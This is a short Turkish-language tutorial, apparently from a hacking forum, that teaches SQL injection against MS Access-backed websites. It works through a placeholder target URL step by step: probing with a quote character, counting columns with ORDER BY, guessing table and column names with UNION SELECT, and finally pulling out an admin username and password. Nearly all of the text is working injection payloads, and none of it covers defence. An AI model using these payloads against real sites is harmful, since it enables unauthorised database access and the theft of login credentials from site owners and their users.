MsAccess SQL İnjection -

bu konumda size çok karşılaşılan bir açık olan MsAccess sql injectiondan bahsedeceğim.

Ayrıca şunuda söyliyeyim: Bana göre en zahmetli SQL İnjection türüdür.Ama öğrenmek lazım

hemen geçelim:

Açık ararken klasik şekilde ’a veya ’ koyuyoruz.

www.hedefsite.com/show.php?id=3’

Genişletmek için tıkla ...

hata geldi şimdi kolon bulucaz.

www.hedefsite.com/show.php?id=3 order by 10

Genişletmek için tıkla ...

dedik hata geldi

www.hedefsite.com/show.php?id=3 order by 9

Genişletmek için tıkla ...

dedik hata gitti demekki kolon sayımız 9muş.

www.hedefsite.com/show.php?id=3 union select 1,2,3,4,5,6,7,8,9 from admin

Genişletmek için tıkla ...

diyoruz.

Farkettiyseniz direkt olarak union select komutu yazmadım sonuna adminde ekledim.Çünkü MsAccess’de direkt olarak kolonlar gözükmez.

yukarda komutumuzu girmiştik hata geldi.

tekrar deniyoruz:

www.hedefsite.com/show.php?id=3 union select 1,2,3,4,5,6,7,8,9 from users

Genişletmek için tıkla ...

dedik ve kolonları gördük.Yani admin’imizle ilgili tablomuz users’imiş.

5. kolon gözükmüş olsun.

www.hedefsite.com/show.php?id=3 union select 1,2,3,4,admin,6,7,8,9 from users

Genişletmek için tıkla ...

dedik hata geldi.Çünkü yanlış kolon adı girdik.pes etmiyoruz

www.hedefsite.com/show.php?id=3 union select 1,2,3,4,username,6,7,8,9 from users

Genişletmek için tıkla ...

dedik ve kolonumuzda gözüktü usernamemiz.

username = HoLMeS

şimdi sıra şifrede

www.hedefsite.com/show.php?id=3 union select 1,2,3,pass,5,6,7,8,9 from users

Genişletmek için tıkla ...

dedik ve şifrede gözüktü.

username = HoLMeS
pass = holmes

buraya kadar arkadaşlar.


​